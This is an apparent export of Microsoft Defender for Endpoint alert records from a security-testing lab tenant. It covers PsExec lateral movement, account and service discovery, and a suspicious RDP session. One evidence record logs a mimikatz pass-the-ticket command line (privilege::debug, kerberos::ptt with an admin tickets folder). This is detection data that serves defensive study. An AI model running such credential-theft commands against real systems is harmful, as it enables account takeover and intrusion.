"36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-21T02:04:34.8433333Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Ip", "evidenceCreationTime": "2022-11-21T02:04:34.8433333Z", "fileName": null, "filePath": null, "ipAddress": "10.0.0.9", "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:04:34.8433333Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:02:27.7361869Z", "processId": 5760, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:04:34.8433333Z", "fileName": "ntoskrnl.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": "2022-11-16T03:32:14.9719242Z", "processId": 4, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f83368154fce0f4e8f9d6fe000ef522fbb3884b7", "sha256": "7e4a848626c99c715bd2c8686061420b8895e12ab8dfa0cce091f9df25750c13", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:09:15.4733333Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:06:14.4989431Z", "processId": 4572, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:16:03.1466667Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:12:11.2117933Z", "processId": 1984, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:34.0266667Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:14:30.1674201Z", "processId": 9008, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:19:04.94Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:16:27.1164549Z", "processId": 7888, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:23:11.6Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:22:22.878082Z", "processId": 8064, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:28:04.79Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:24:45.5696509Z", "processId": 6984, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:33:30.8133333Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:31:41.876943Z", "processId": 9664, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:36:19.81Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:33:42.4457797Z", "processId": 9656, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T17:23:28.6166667Z
Suspicious
None
darol
prod.env
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638043451255718702_26524107
248fe27b-de9b-4a10-a550-6bcebfe83b44
741
MicrosoftDefenderForEndpoint
2022-11-18T05:12:05.5718949Z
2022-11-19T01:35:46.6533333Z
2022-11-19T01:35:46.5533333Z
2022-11-18T05:09:32.0366644Z
2022-11-18T05:14:15.9874335Z
File dropped and launched from remote location
A remote session dropped a file and executed it. An attacker or a malware might be an attempting move laterally or propagate.
LateralMovement
Resolved
Medium
49
PendingApproval
TruePositive
SecurityTesting
WindowsDefenderAtp
17d50613-c135-4981-858e-86cdecb4e46e
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1021.002", "T1105", "T1570" ]
[ { "aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600", "defenderAvStatus": "Updated", "deviceDnsName": "evilcorp.cn", "firstSeen": "2022-08-08T08:29:47.252Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "steve", "domainName": "MSDXV2" } ], "mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Semi Auto Client", "riskScore": "High", "tags": [ "semi auto" ], "version": "21H1", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66" } } ]
[ { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV2", "entityType": "User", "evidenceCreationTime": "2022-11-18T05:12:05.72Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "User", "evidenceCreationTime": "2022-11-18T05:12:05.72Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": "S-1-0-0", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-18T05:12:05.72Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "NotFound", "remediationStatusDetails": "The system cannot find the file specified.", "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Ip", "evidenceCreationTime": "2022-11-18T05:12:05.72Z", "fileName": null, "filePath": null, "ipAddress": "10.0.0.9", "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:12:05.72Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-18T05:10:14.6889142Z", "processId": 8284, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:12:05.72Z", "fileName": "ntoskrnl.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": "2022-11-16T03:32:14.9719242Z", "processId": 4, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f83368154fce0f4e8f9d6fe000ef522fbb3884b7", "sha256": "7e4a848626c99c715bd2c8686061420b8895e12ab8dfa0cce091f9df25750c13", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:16:46.67Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-18T05:14:15.4780441Z", "processId": 8968, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638045932698230916_1344612009
66b2987b-84bd-4e3e-a885-888fc91a459b
765
MicrosoftDefenderForEndpoint
2022-11-21T02:07:49.8231081Z
2022-11-21T02:07:53.5166667Z
null
2022-11-21T01:55:47.8840459Z
2022-11-21T02:04:42.8559403Z
Suspicious System Service Discovery
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
Discovery
New
Low
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
null
null
null
[ "T1007", "T1059.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "corp.local", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:07:49.8666667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:07:49.8666667Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:07:26.0872385Z", "parentProcessFileName": "explorer.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 4680, "processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Downloads'", "processCreationTime": "2022-11-21T02:01:28.4753286Z", "processId": 11068, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:07:49.8666667Z", "fileName": "explorer.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:07:25.9825113Z", "parentProcessFileName": "userinit.exe", "parentProcessFilePath": null, "parentProcessId": 4684, "processCommandLine": "Explorer.EXE", "processCreationTime": "2022-11-10T07:07:26.0872385Z", "processId": 4680, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d", "sha256": "8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638045935112835331_1703441138
b4f9432b-672b-474a-b166-2355402c25c3
765
MicrosoftDefenderForEndpoint
2022-11-21T02:11:51.283555Z
2022-11-26T01:35:43.17Z
2022-11-26T01:35:43.0633333Z
2022-11-21T02:07:15.8950101Z
2022-11-21T02:34:30.3409598Z
Suspicious User Account Discovery
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
Discovery
Resolved
Low
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1033", "T1087", "T1087.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:27:58.906Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "Defender", "domainName": "MSDXV2" } ], "mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "WindowsServer2019", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "Critical", "tags": [], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e" } } ]
[ { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:11:51.33Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T15:08:13.59Z
Suspicious
None
root
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:59:19.3466667Z
Malicious
None
jeff
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
10,684
"mimikatz.exe" privilege::debug "kerberos::ptt C:\M365DAttack\Admin-Tickets" exit
2022-12-22T08:47:53.1208546Z
6,324
2022-12-22T08:47:11.8139068Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
7ba8aa008687dd62d639cb45b52c7c9f971c65c1
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:04:26.0433333Z
Suspicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
8,844
cmd.exe /c whoami
2022-11-21T02:02:27.0051694Z
11,068
2022-11-21T02:01:28.4753286Z
powershell.exe
\Device\HarddiskVolume4\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T04:51:48.7833333Z
Malicious
None
Takeshi
TMTOWER-BOOK
S-1-5-21-7316772-2057538409-3008203053-1001
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T13:51:09.93Z
Suspicious
None
darol
evilcorp.cn
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638072957102123344_1857259199
c1bf2d02-b23d-458d-89d3-35ff110f586d
975
MicrosoftDefenderForEndpoint
2022-12-22T08:48:30.2123536Z
2022-12-22T08:54:54.5066667Z
null
2022-12-22T08:26:21.6761079Z
2022-12-22T08:47:29.7049844Z
Suspicious RDP session
A combination of several suspicious RDP session activities has been detected in this device. Attackers might be attempting to establish a foothold in the environment by using various reconnaissance and persistence methods, then evade detection by tampering with and turning off security features to complete their objectives.
SuspiciousActivity
New
High
61
PendingApproval
null
null
WindowsDefenderAtp
e3270960-77a9-4f2b-a6ba-ea6a9d5e86d8
null
null
null
[ "T1003", "T1021.001", "T1555", "T1558.003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "internal.corp", "firstSeen": "2022-12-08T05:21:19.944Z", "healthStatus": "Inactive", "loggedOnUsers": [], "mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "High", "tags": [], "version": "1809", "vmMetadata": null } ]
